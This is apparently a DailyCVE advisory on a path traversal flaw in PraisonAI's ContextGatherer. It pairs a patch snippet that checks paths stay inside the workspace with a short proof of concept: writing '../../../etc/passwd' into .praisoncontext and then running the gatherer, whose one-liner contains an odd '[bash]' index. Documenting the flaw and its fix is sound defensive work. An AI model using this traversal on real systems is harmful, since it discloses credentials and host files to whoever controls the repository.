PraisonAI, Path Traversal Vulnerability, CVE-2026-42211 (medium) -DC-Oct2026-2948

Listen to this Post

PraisonAI includes a context-gathering utility designed to bundle repository files for user reference or model ingestion. Specifically, the `ContextGatherer` component processes workspace directories by reading local configuration files such as `.praisoncontext` and `.praisoninclude` to determine which additional files should be appended to the generated context payload.
An inherent security flaw arises because these files can specify absolute paths or relative parent directory traversal sequences without proper sanitization or boundary validation. When `ContextGatherer` iterates over the entries defined within these configuration files, it uses an unsafe path-joining operation via Python’s standard library.
Because standard filesystem path-joining methods can discard or bypass base workspace boundaries when encountering absolute paths or explicit parent traversal sequences, the underlying logic successfully opens files located entirely outside of the intended project root.
Once opened, the contents of these arbitrary host files—which may include adjacent source code, local configurations, API keys, logs, or sensitive system transcripts—are automatically appended to the output context bundle. If a user or automated service triggers the context-gathering routine within a repository controlled by an untrusted entity, the sensitive file disclosures are returned directly to the caller or transmitted downstream to an external model.

DailyCVE Form:

Platform: PraisonAI
Version: v2.3.10 to v4.6.63
Vulnerability : Path Traversal
Severity: Medium
date: 2026-10-09

Prediction: 2026-10-20

What Undercode Say

The vulnerability stems from insufficient validation in `ContextGatherer.get_include_paths()` and subsequent file-processing loops. Developers neglected to enforce a strict containment check verifying that resolved paths remain within the designated workspace root before invoking file reads.

def _resolve_workspace_include(workspace: str, include_path: str) -> Path:
root = Path(workspace).resolve()
candidate = Path(include_path)
if not candidate.is_absolute():
candidate = root / candidate
resolved = candidate.resolve()
try:
resolved.relative_to(root)
except ValueError as exc:
raise PermissionError(f"Context include path is outside workspace: {include_path}") from exc
return resolved

Exploit: (Educational Purposes!)

An attacker can create a malicious repository workspace containing specially crafted include directives to read sensitive system files outside the working directory.

mkdir -p workspace
echo "../../../etc/passwd" > workspace/.praisoncontext
python3 -c 'from praisonai.ui.context import ContextGatherer; print(ContextGatherer(directory="workspace").run()[bash])'

Protection:

Upgrade to a patched release where path canonicalization checks are enforced, or manually apply validation logic ensuring all include entries successfully pass a relative containment check against the workspace root.

root = Path(self.directory).resolve()
resolved = (root / include_path).resolve()
resolved.relative_to(root)

Impact:

Successful exploitation allows unauthorized local file reads of process-readable files outside the project root, leading to potential disclosure of sensitive configuration files, credentials, and source code.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top